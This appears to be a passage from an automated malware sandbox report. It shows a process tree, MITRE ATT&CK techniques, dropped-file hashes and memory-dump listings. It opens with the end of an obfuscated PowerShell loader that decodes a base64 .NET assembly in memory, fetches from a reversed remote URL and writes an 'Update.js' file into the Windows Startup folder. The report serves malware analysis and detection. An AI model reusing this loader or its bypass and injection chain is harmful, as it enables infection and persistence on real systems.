M↓:↓bwBt↓:↓G0↓:↓ZQBu↓:↓HQ↓:↓cw↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓i↓:↓↓:↓E↓:↓↓:↓QBD↓:↓G8↓:↓bQBw↓:↓GE↓:↓bgB5↓:↓E4↓:↓YQBt↓:↓GU↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓q↓:↓↓:↓E↓:↓↓:↓QBG↓:↓Gk↓:↓b↓:↓Bl↓:↓EQ↓:↓ZQBz↓:↓GM↓:↓cgBp↓:↓H↓:↓↓:↓d↓:↓Bp↓:↓G8↓:↓bg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓C↓:↓↓:↓B↓:↓EY↓:↓aQBs↓:↓GU↓:↓VgBl↓:↓HI↓:↓cwBp↓:↓G8↓:↓bg↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓MQ↓:↓u↓:↓D↓:↓↓:↓Lg↓:↓w↓:↓C4↓:↓M↓:↓↓:↓↓:↓↓:↓EQ↓:↓Eg↓:↓B↓:↓Ek↓:↓bgB0↓:↓GU↓:↓cgBu↓:↓GE↓:↓b↓:↓BO↓:↓GE↓:↓bQBl↓:↓↓:↓↓:↓↓:↓QwBs↓:↓GE↓:↓cwBz↓:↓Ew↓:↓aQBi↓:↓HI↓:↓YQBy↓:↓Hk↓:↓Mw↓:↓u↓:↓GQ↓:↓b↓:↓Bs↓:↓↓:↓↓:↓↓:↓S↓:↓↓:↓S↓:↓↓:↓E↓:↓T↓:↓Bl↓:↓Gc↓:↓YQBs↓:↓EM↓:↓bwBw↓:↓Hk↓:↓cgBp↓:↓Gc↓:↓a↓:↓B0↓:↓↓:↓↓:↓↓:↓QwBv↓:↓H↓:↓↓:↓eQBy↓:↓Gk↓:↓ZwBo↓:↓HQ↓:↓I↓:↓Cp↓:↓C↓:↓↓:↓I↓:↓↓:↓y↓:↓D↓:↓↓:↓Mg↓:↓y↓:↓↓:↓↓:↓↓:↓Kg↓:↓B↓:↓↓:↓E↓:↓T↓:↓Bl↓:↓Gc↓:↓YQBs↓:↓FQ↓:↓cgBh↓:↓GQ↓:↓ZQBt↓:↓GE↓:↓cgBr↓:↓HM↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓BM↓:↓BI↓:↓↓:↓QBP↓:↓HI↓:↓aQBn↓:↓Gk↓:↓bgBh↓:↓Gw↓:↓RgBp↓:↓Gw↓:↓ZQBu↓:↓GE↓:↓bQBl↓:↓↓:↓↓:↓↓:↓QwBs↓:↓GE↓:↓cwBz↓:↓Ew↓:↓aQBi↓:↓HI↓:↓YQBy↓:↓Hk↓:↓Mw↓:↓u↓:↓GQ↓:↓b↓:↓Bs↓:↓↓:↓↓:↓↓:↓Ig↓:↓B↓:↓↓:↓E↓:↓U↓:↓By↓:↓G8↓:↓Z↓:↓B1↓:↓GM↓:↓d↓:↓BO↓:↓GE↓:↓bQBl↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓N↓:↓↓:↓I↓:↓↓:↓E↓:↓U↓:↓By↓:↓G8↓:↓Z↓:↓B1↓:↓GM↓:↓d↓:↓BW↓:↓GU↓:↓cgBz↓:↓Gk↓:↓bwBu↓:↓↓:↓↓:↓↓:↓MQ↓:↓u↓:↓D↓:↓↓:↓Lg↓:↓w↓:↓C4↓:↓M↓:↓↓:↓↓:↓↓:↓Dg↓:↓C↓:↓↓:↓B↓:↓EE↓:↓cwBz↓:↓GU↓:↓bQBi↓:↓Gw↓:↓eQ↓:↓g↓:↓FY↓:↓ZQBy↓:↓HM↓:↓aQBv↓:↓G4↓:↓↓:↓↓:↓↓:↓x↓:↓C4↓:↓M↓:↓↓:↓u↓:↓D↓:↓↓:↓Lg↓:↓w↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓D↓:↓↓:↓↓:↓↓:↓w↓:↓↓:↓↓:↓DYPQ↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓↓:↓=';$LAtEb = $LAtEb.Replace('↓:↓', 'A');[Byte[]] $Xlhdn = [System.Convert]::FromBase64String( $LAtEb );[System.AppDomain]::CurrentDomain.Load($Xlhdn).GetType('ClassLibrary3.Class1').GetMethod('prFVI').Invoke($null, [object[]] ('etadpU/lru/ur.zv3btlnbv5wyg02byzgitfgipbsdvlhirnwyobsa//:ptth' , 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js' , 'true' ) );
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1156
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\x.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3060
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\x.ps1
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        
        PID:4644
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:4512
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1428
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1676
  2⤵
  - Program crash
  PID:1548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 548 -ip 548
1⤵
PID:4728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
8c29d07a71c63fa07dfea049a4eb7ce4

SHA1
a0a09d7ff4ba19cb6a8e92e681196d63bc7c5562

SHA256
5be64a2f8c37c57a52cd26a7f816efdfe7883773db83cafee7720eb9c125ff5e

SHA512
e382ae6417e8b32f15db9675e0e427f309de62e01148492a34283bf42defd9b03e2cddbcd4ab84b773ceed79409108a6c43b4edae370c6c7e87839d866b89c10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
4b538545a701c094d323f145cd5de37b

SHA1
db5be9fc130fc3e5295a19ed2183e74c3ffc3321

SHA256
7e7246de1211fcc952458115dfcd49c87f6ef46675ded9d5dcace6d9ebf27731

SHA512
5294b92470e94c1f5e0dc5cd2547361c160c9ab4d38a04e7c157d39accf2ae65685645d7e8f7b23debb4ce70eaf022844e8d9303fdbcf4c20e55d1ef84e06fc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
fb8e130647641b470d36f7fd9665e519

SHA1
a5b744bafd43f999996be73a83e990186b30bfb9

SHA256
cdfe155a05b18937196d9496653a57ae50799c72af484597bd615e83ae0bd530

SHA512
86a2356b9a53ad22f3d792219424b995760862e9fe7d7427217f5abfdd5c44cba620e94cd48a09811054d905d6a96540ad93ba56146724c881d0476a3dfea70e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pazeciur.kr1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.ps1

Filesize
1.9MB

MD5
059d6bf7c3ab51070b936ff6112d0942

SHA1
ffc72980e5ea178f9a9e7374f9c652c0e5a3fae9

SHA256
2d81f89e6cb93a89d79da6691c2bb01004164359279c99a203517cd45dc26b67

SHA512
59a07aec14acaed41f0b5a31456611bbc00848d58aa4fb813c0ea23dd512a5902ce6f77ad7011c4885bd9b6c5da554ff20f617de885677f82c8c4a09b5c10f97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.js

Filesize
2KB

MD5
ea3229e47d2b4bec8b108c6770e5d002

SHA1
ea05a91457d220638521c783b5e067a59efbc4e2

SHA256
9ecd65ed311cb4b02fe7e1da061f3a3b0bb2c6517b07995bcfb3f644e8481914

SHA512
f5213395f7cf4267ae2415c398f559a5323e80cc33de77ed342eea9d13a0e5f6dfcd1e8ce967025a74f0949ef337bc18c69e87916b752a520f432a036c857b15

Download Submit
memory/548-0-0x000000007469E000-0x000000007469F000-memory.dmp

Filesize
4KB

Download
memory/548-1-0x0000000000C00000-0x0000000000F70000-memory.dmp

Filesize
3.4MB

Download
memory/548-2-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/548-3-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/548-4-0x0000000005D90000-0x00000000060A2000-memory.dmp

Filesize
3.1MB

Download
memory/548-81-0x0000000074690000-0x0000000074E40000-memory.dmp

Filesize
7.7MB

Download
memory/1156-22-0x00000000068C0000-0x00000000068DE000-memory.dmp

Filesize
120KB

Download
memory/1156-11-0x0000000006340000-0x00000000063A6000-memory.dmp

Filesize
408KB

Download
memory/1156-10-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/1156-21-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/1156-9-0x0000000006230000-0x0000000006252000-memory.dmp

Filesize
136KB

Download
memory/1156-23-0x0000000006900000-0x000000000694C000-memory.dmp

Filesize
304KB

Download
memory/1156-24-0x0000000006C70000-0x0000000006C78000-memory.dmp

Filesize
32KB

Download
memory/1156-25-0x0000000006D80000-0x0000000006E1C000-memory.dmp

Filesize
624KB

Download
memory/1156-8-0x0000000005A90000-0x00000000060B8000-memory.dmp

Filesize
6.2MB

Download
memory/1156-7-0x0000000005420000-0x0000000005456000-memory.dmp

Filesize
216KB

Download
memory/1428-74-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/1428-79-0x0000000005270000-0x0000000005302000-memory.dmp

Filesize
584KB

Download
memory/1428-80-0x0000000005210000-0x000000000521A000-memory.dmp

Filesize
40KB

Download
memory/1428-76-0x0000000005530000-0x0000000005AD4000-memory.dmp

Filesize
5.6MB

Download
memory/3060-51-0x0000000007770000-0x0000000007813000-memory.dmp

Filesize
652KB

Download
memory/3060-55-0x0000000007B40000-0x0000000007BD6000-memory.dmp

Filesize
600KB

Download
memory/3060-56-0x0000000007AC0000-0x0000000007AD1000-memory.dmp

Filesize
68KB

Download
memory/3060-54-0x0000000007930000-0x000000000793A000-memory.dmp

Filesize
40KB

Download
memory/3060-53-0x00000000078C0000-0x00000000078DA000-memory.dmp

Filesize
104KB

Download
memory/3060-52-0x0000000007F00000-0x000000000857A000-memory.dmp

Filesize
6.5MB

Download
memory/3060-50-0x0000000006B40000-0x0000000006B5E000-memory.dmp

Filesize
120KB

Download
memory/3060-40-0x000000006D0D0000-0x000000006D11C000-memory.dmp

Filesize
304KB

Download
memory/3060-39-0x0000000007730000-0x0000000007762000-memory.dmp

Filesize
200KB

Download
memory/4512-89-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-107-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-72-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-73-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-70-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-69-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-82-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-83-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-84-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-85-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-86-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-87-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-88-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-139-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-90-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-91-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-92-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-93-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-94-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-95-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-96-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-97-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-98-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-99-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-100-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-101-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-102-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-103-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-104-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-105-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-106-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-71-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-108-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-109-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-110-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-111-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-112-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-113-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-114-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-115-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-116-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-117-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-118-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-119-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-120-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-121-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-122-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-123-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-124-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-125-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-126-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-127-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-128-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-129-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-130-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-131-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-132-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-133-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-134-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-135-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-136-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-137-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4512-138-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/4568-68-0x0000000006AF0000-0x0000000006B08000-memory.dmp

Filesize
96KB

Download